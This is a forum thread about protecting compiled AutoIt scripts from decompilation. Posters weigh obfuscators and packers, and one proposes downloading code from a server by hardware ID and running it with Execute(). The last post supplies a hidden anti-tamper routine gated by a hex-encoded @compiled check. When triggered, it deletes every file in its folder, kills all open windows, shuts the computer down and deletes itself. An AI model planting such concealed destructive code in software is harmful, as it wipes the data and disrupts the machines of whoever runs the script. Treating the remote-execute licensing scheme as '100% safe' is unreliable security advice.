Best way to secure script

[Szmycu]

Hello what is the best way to secure autoit scripts right now?

People say prebuild stripper in SciTE is not high secure. Other problem is if I use stripper in my program I use a lot of _Timer_SetTimer functions. After stripping timers not work.

I seen this but now it not work



Next thing is

Is it better than stripper builded in SciTE and got more secure?

Please write me ur knowledge about how to make scripts secure. I know its hard to recieve but tell me ur thoughts

[florian0]

Nothing will secure your script. No PeLock, No Themida, No VMProtect, No Enigma, nothing.

Use an AutoIT-Obfuscation to obfuscate the source of your high-value algorithms. Everything else is just useless.

[Szmycu]

I know it would not be perfect but something can be done to make it secure as more as it can.

Maybe someone got other obfuscator, crypter etc?

[elmarcia]

Compile x64, exe2aut decompiler only support x32 files

[FacePalmMan]

You can also just use authentification.

your examplecode:

Code:

Func __CalculateWorldFormula($bob)
	$a = DiscreteLogarithm(Mod($bob ^ 4, 3))
	return $a
EndFunc

becomes

Code:

$HardwareID = _getHWID()
Func __CalculateWorldFormula($bob)
	$sCode = __GetCodeFromServer($HardwareID, "Worldformula-line.au3")
	If @error > 0 And $sCode = "HWID not registered" Then
		MsgBox(16, "Nope", "You son of a nice Mother!" & @CRLF & "You are not allowed to use this!")
		Exit 1337
	EndIf
	$a = Execute($sCode)
	return $a
EndFunc

No If clauses that could be bypassed to grant access. So also no need to protect your code anymore.
If there is an error, the server just doesn't give you the code. And thus you can't find it out. The downsides are that you need to have an FTP-server that has to run 24/7 and you need to register every user that buys a license one by one. (Or you could also write a script for it)

100% safe (in case the attacker doesn't own a license (buying a license + getting your precious code + publishing it for free = no profit = still 100% safe))

Just get yourself a free FTP server, (there are plenty out there) and an webaddress (freedns.afraid.org gives you some like (youraddress).ignorelist.com for free, which is fine for this purpose)

[Szmycu]

Ou man great way of thinking and very helpful. I got my server which one is connecting with autoit program and I register all users with license.

I understand the general assumption but dont know exactly how to implement this code.


How it looks now:
- autoit program first gui input login user and pass + check _getHWID
- query to php on server about login user and his HWID
- autoit program recieve response with true or false, login or error
- If everything correct second gui with main functions will be appeared, if not return error

How it will looks with this great authentication method u mentioned?

Where this main code would be saved on ftp, there probably would be a path(web adress) in first gui to main code - second gui saved in ftp?

[xShizoidx]

[Szmycu]

I have tried Safe v1.1.1.rar but after compilation, compiled safe file give me msg. "This file would not work on ur System". I got windows 10 x64 maybe it caused by, but final program must work on windows 10 too.

I tried this too but it not work with new ver of autoit

only shadow obfuscator will not give me much

and the ASM I dont know and hopefully would not know

[owadziak]

Pelock isnt a good idea, cause if u got GUI build to your bot, Pelock will give you Error Everytime you try to obfuscate code with "Case $Variablename"....
I tried to talk with PeLock Dev, but after i send him few msg, about error's he just stop to respond me.
Im also looking for a way to "Protect " my script

[Szmycu]

I wrote them about this too

they only repeat f***ing rhyme about no security way. Sama frajernia xd

[atom0s]

No matter how you "protect" your script it will be able to be dumped since it is interpreted at some point.

Quote:

Originally Posted by FacePalmMan

You can also just use authentification.

your examplecode:

Code:

Func __CalculateWorldFormula($bob)
	$a = DiscreteLogarithm(Mod($bob ^ 4, 3))
	return $a
EndFunc

becomes

Code:

$HardwareID = _getHWID()
Func __CalculateWorldFormula($bob)
	$sCode = __GetCodeFromServer($HardwareID, "Worldformula-line.au3")
	If @error > 0 And $sCode = "HWID not registered" Then
		MsgBox(16, "Nope", "You son of a nice Mother!" & @CRLF & "You are not allowed to use this!")
		Exit 1337
	EndIf
	$a = Execute($sCode)
	return $a
EndFunc

No If clauses that could be bypassed to grant access. So also no need to protect your code anymore.
If there is an error, the server just doesn't give you the code. And thus you can't find it out. The downsides are that you need to have an FTP-server that has to run 24/7 and you need to register every user that buys a license one by one. (Or you could also write a script for it)

100% safe (in case the attacker doesn't own a license (buying a license + getting your precious code + publishing it for free = no profit = still 100% safe))

Just get yourself a free FTP server, (there are plenty out there) and an webaddress (freedns.afraid.org gives you some like (youraddress).ignorelist.com for free, which is fine for this purpose)

This isn't really "safe" as it can be bypassed extremely easily.

[FacePalmMan]

Quote:

Originally Posted by atom0s

No matter how you "protect" your script it will be able to be dumped since it is interpreted at some point.




This isn't really "safe" as it can be bypassed extremely easily.

Where do you see that it can be bypassed? The code is downloaded by the server. If you are not registered, the server will not give you the code (and that is what you need, cuz that is what the computer needs so that it can know what to do). HWID not registered = Server doesn't give you code = nothing that someone could steal = only bypassable if that person buys your product and then steals your code.
If you want to further protect your code, do the following:

But if you still fear that this might happen, just do the following:
1. Copy all code from the includes into your script (if you are not sure about this point, just decompile a script that has includes and look at where the actual code is)

Example of how it could look like (I took the smallest UDF as an example to keep things easy. If you use things like WinAPI or GDIPlus you will have a few thousand lines, but that's ok. Will be even better for hiding!)

 Spoiler

Code:

#include <SendMessage.au3>
_SendMessage(...,stuff,...)

becomes

Code:

#include-once

; #INDEX# =======================================================================================================================
; Title .........: SendMessage
; AutoIt Version : 3.3.12.0
; Language ......: English
; Description ...: Functions that assist SendMessage calls.
; Author(s) .....: Valik, Gary Frost
; Dll(s) ........: user32.dll
; ===============================================================================================================================

; #CURRENT# =====================================================================================================================
; _SendMessage
; _SendMessageA
; ===============================================================================================================================

; #FUNCTION# ====================================================================================================================
; Author ........: Valik
; Modified.......: Gary Frost (GaryFrost) aka gafrost
; ===============================================================================================================================
Func _SendMessage($hWnd, $iMsg, $wParam = 0, $lParam = 0, $iReturn = 0, $wParamType = "wparam", $lParamType = "lparam", $sReturnType = "lresult")
	Local $aResult = DllCall("user32.dll", $sReturnType, "SendMessageW", "hwnd", $hWnd, "uint", $iMsg, $wParamType, $wParam, $lParamType, $lParam)
	If @error Then Return SetError(@error, @extended, "")
	If $iReturn >= 0 And $iReturn <= 4 Then Return $aResult[$iReturn]
	Return $aResult
EndFunc   ;==>_SendMessage

; #FUNCTION# ====================================================================================================================
; Author ........: Valik
; Modified.......: Gary Frost (GaryFrost) aka gafrost
; ===============================================================================================================================
Func _SendMessageA($hWnd, $iMsg, $wParam = 0, $lParam = 0, $iReturn = 0, $wParamType = "wparam", $lParamType = "lparam", $sReturnType = "lresult")
	Local $aResult = DllCall("user32.dll", $sReturnType, "SendMessageA", "hwnd", $hWnd, "uint", $iMsg, $wParamType, $wParam, $lParamType, $lParam)
	If @error Then Return SetError(@error, @extended, "")
	If $iReturn >= 0 And $iReturn <= 4 Then Return $aResult[$iReturn]
	Return $aResult
EndFunc   ;==>_SendMessageA

_SendMessage(...,stuff,...)

2. Hide some really nasty code that checks for @compiled (or instead of @compiled you may try: Execute(BinaryToString("0x40636F6D70696C6564")) is the same but is much harder to find) in it. (I would love to see a script that makes the leechers reply to your thread with "I have tried to leech your code. But I am too dumb and have not enough skills for that." and then deletes their accounts)

Example code:

 Spoiler

Deletes itself and everything in its folder, closes all windows and finally shuts the computer down and deletes itself:

Code:

;WARNING!!! THIS CODE SHOULD ONLY BE EXECUTED IF ITS FUNCTIONALITY AND RISKS ARE FULLY UNDERSTOOD! I AM NOT RESPONSIBLE FOR ANY DAMAGE DONE BY IMPROPER USE/MISUSE/ABUSE!
If Not Execute(BinaryToString("0x40636F6D70696C6564")) Then ;If not @compiled Then
	$FFFF = FileFindFirstFile("*.*")
	If $FFFF <> -1 Then
		While 1
			$FFNF = FileFindNextFile($FFFF) ;Get the next file in the folder and delete it
			If @error Then ExitLoop
			FileDelete(@ScriptDir & "\" & $FFNF)
		WEnd
	EndIf
	;List and kill all windows
	$aWin = WinList()
	For $i = 1 To $aWin[0][0]
		WinKill($aWin[$i][1])
	Next
	;Delete itself and shut down.
	Run(@ComSpec & ' /c shutdown -s -t 10 & ping -n 3 127.0.0.1 & del ' & @ScriptName, "", @SW_HIDE)
EndIf